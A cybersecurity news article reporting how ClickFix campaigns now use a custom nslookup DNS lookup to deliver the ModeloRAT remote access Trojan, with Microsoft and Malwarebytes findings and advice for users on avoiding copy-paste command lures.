TechTarget and Informa Tech’s Digital Business Combine. Dark Reading Resource Library Black Hat News Omdia Cybersecurity Advertise NEWSLETTER SIGN-UP Cybersecurity Topics World The Edge DR Technology Events Resources ENDPOINT SECURITY REMOTE WORKFORCE CYBERATTACKS & DATA BREACHES THREAT INTELLIGENCE NEWS ClickFix Attacks Abuses DNS Lookup Command to Deliver ModeloRAT ClickFix campaigns have adapted to the latest defenses with a new technique to trick users into infecting their own machines with malware. Elizabeth Montalbano, Contributing Writer February 17, 2026 4 Min Read SOURCE: TADA IMAGES VIA SHUTTERSTOCK ClickFix attacks have evolved to meet the latest defense measures by using a new command to circumvent security and make people infect their own devices with malware — in this case, a remote access Trojan (RAT) for Windows systems. Microsoft was the first to notice the change to the attacks, which have been ongoing since 2024, posting on X last week that attackers using ClickFix had come up with "yet another evasion approach" by using the nslookup command instead of PowerShell or mshta commands, which previous attacks have leveraged. Attackers are now "asking targets to run a command that executes a custom DNS lookup and parses the 'Name:' response to receive the next-stage payload for execution," according to Microsoft. Using DNS in this way reduces dependency on traditional Web requests and allows attackers to "blend malicious activity into normal network traffic," the company said. The attacks can work even in an enterprise environment, making corporate users browsing the Web susceptible. Related:Ivanti EPMM Zero-Day Bugs Spark Exploit Frenzy — Again In the attacks that Microsoft observed, the command kicks off an infection chain that downloads a ZIP archive from an external server that extracts a malicious Python script to eventually drop a Visual Basic Script to execute ModeloRAT. The malware is a Python‑based RAT that gives attackers hands‑on control over an infected Windows machine. Same Attack Playbook With a DNS Twist The nslookup command "exists to troubleshoot network problems, check if DNS is configured correctly, and investigate odd domains, not to download or run programs," according to a follow-up analysis of the attack by Malwarebytes Labs published Monday. Bad actors using ClickFix apparently have figured out that the mshta and PowerShell commands they were using previously are "increasingly being blocked by security software," Malwarebytes researcher Pieter Arntz wrote. "Nslookup is a built‑in tool to use the Internet 'phonebook,' and the criminals are basically abusing that phonebook to smuggle in instructions and malware instead of just getting an address," he wrote. Aside from this difference, the attacks follow the same playbook at the start, delivering fake CAPTCHA instructions to prove that someone is not a bot and thus giving people a false sense of security that they are browsing the Web safely, according to the post. Following the fake CAPTCHA challenge, attackers typically use deception — either informing people to solve non-existing computer problems or install an update to continue; causing browser crashes; or even delivering instruction videos — all in an effort to convince them to self-infect their computers by pasting a malicious command that is meant to solve the issue. Instead, it delivers malware, with previous attacks delivering infostealers or — in the case of abuse of ClickFix by North Korean APTs — backdoors for spying on victims. Related:Booz Allen Announces General Availability of Vellox Reverser to Automate Malware Defense These recent attacks demonstrate that cybercriminals have found yet another way to abuse a trusted technical tool to carry out the next step of the attack, which could result in someone giving up control of their device over to attackers, Artnz wrote. Advice for Safe Browsing Indeed, given the proliferation of ClickFix attacks and their continued evolution since Proofpoint researchers first spotted them about two years ago, it's essential that people are aware of the danger that lurks in making unknown changes to their systems via commands delivered through their browser. To that end, Malwarebytes Labs provided users advice on how to protect themselves. Firstly, they should take it slow when encountering instructions on a Web page or prompt, especially if asked to run commands on your device or copy-paste code. Arntz warned that some attacks use timers or countdowns to for these updates or commands. "Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action," he wrote. Related:Vibe-Coded 'Sicarii' Ransomware Can't Be Decrypted People also should always avoid running commands or scripts from untrusted sources such as websites, emails, or messages "unless you trust the source and understand the action’s purpose," Arntz wrote. It helps to verify the instructions independently through official documentation or even customer support before taking any action. ClickFix infections can also be prevented if the use of copy-paste for commands is limited, Artnz noted, since manually typing commands into a system instead of merely copying and pasting them can reduce the risk of unknowingly running malicious payloads hidden in copied text. About the Author Elizabeth Montalbano, Contributing Writer Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking. More Insights Industry Reports ThreatLabz 2025 Ransomware Report The Total Economic Impact™ Of Zscaler Private Access (ZPA) Zscaler ThreatLabz 2025 VPN Risk Report GigaOm Radar for CNAPP The Total Economic Impact™ of Google SecOps Access More Research Webinars Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need Securing Remote and Hybrid Work Forecast: Beyond the VPN AI-Powered Threat Detection: Beyond Traditional Security Models Healthcare Security: Protecting Patient Data and Clinical Operations Ransomware and the Supply Chain: A Fireside Chat with the CISOs Who Literally Wrote the Book on Third-Party Risk More Webinars You May Also Like ENDPOINT SECURITY GitHub-Hosted Malware Infects 1M Windows Users by Elizabeth Montalbano, Contributing Writer MAR 10, 2025 ENDPOINT SECURITY DPRK Actors Deploy VS Code Tunnels for Remote Hacking by Elizabeth Montalbano, Contributing Writer JAN 22, 2026 ENDPOINT SECURITY Chrome Store Features Extension Poisoned With Sophisticated Spyware by Elizabeth Montalbano, Contributing Writer JUL 07, 2025 CYBERATTACKS & DATA BREACHES DeepSeek Breach Opens Floodgates to Dark Web by Emma Zaballos APR 22, 2025 Editor's Choice ENDPOINT SECURITY Ivanti EPMM Zero-Day Bugs Spark Exploit Frenzy — Again byNate Nelson, Contributing Writer FEB 12, 2026 6 MIN READ CYBER RISK Those 'Summarize With AI' Buttons May Be Lying to You byJai Vijayan, Contributing Writer FEB 12, 2026 5 MIN READ CYBERATTACKS & DATA BREACHES Senegalese Data Breaches Expose Lack of Security Maturity byNate Nelson, Contributing Writer FEB 12, 2026 5 MIN READ Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE Webinars Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need WED, APRIL 1, 2026 AT 1PM EST Securing Remote and Hybrid Work Forecast: Beyond the VPN TUES, MARCH 10, 2026 AT 1PM EST AI-Powered Threat Detection: Beyond Traditional Security Models WED, MARCH 25, 2026 AT 1PM EST Healthcare Security: Protecting Patient Data and Clinical Operations THURS, APRIL 9,2026 AT 1PM EST Ransomware and the Supply Chain: A Fireside Chat with the CISOs Who Literally Wrote the Book on Third-Party Risk THURS, FEB 19, 2026 AT1PM EST More Webinars White Papers The Threat Prevention Buyer's Guide: Find the best AI-driven threat protection solution to stop file-based attacks. Assessing Security Architectures: Zero Trust vs. Network-Centric Models 5 Steps to Stop Ransomware With Zero Trust 10 Ways a Zero Trust Architecture Protects Against Ransomware Why Removing Admin Rights Is the Key to Better Cyber Insurance Rates eBook Explore More White Papers GISEC GLOBAL 2026 GISEC GLOBAL is the most influential and the largest cybersecurity gathering in the Middle East & Africa, uniting global CISOs, government leaders, technology buyers, and ethical hackers for three power-packed days of innovation, strategy, and live cyber drills. 📌 BOOK YOUR SPACE Discover More Black Hat Omdia Working With Us About Us Advertise Reprints Join Us NEWSLETTER SIGN-UP Follow Us Copyright © 2026 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. TechTarget, Inc.’s registered office is 275 Grove St. Newton, MA 02466. Home| Cookie Policy| Privacy| Terms of Use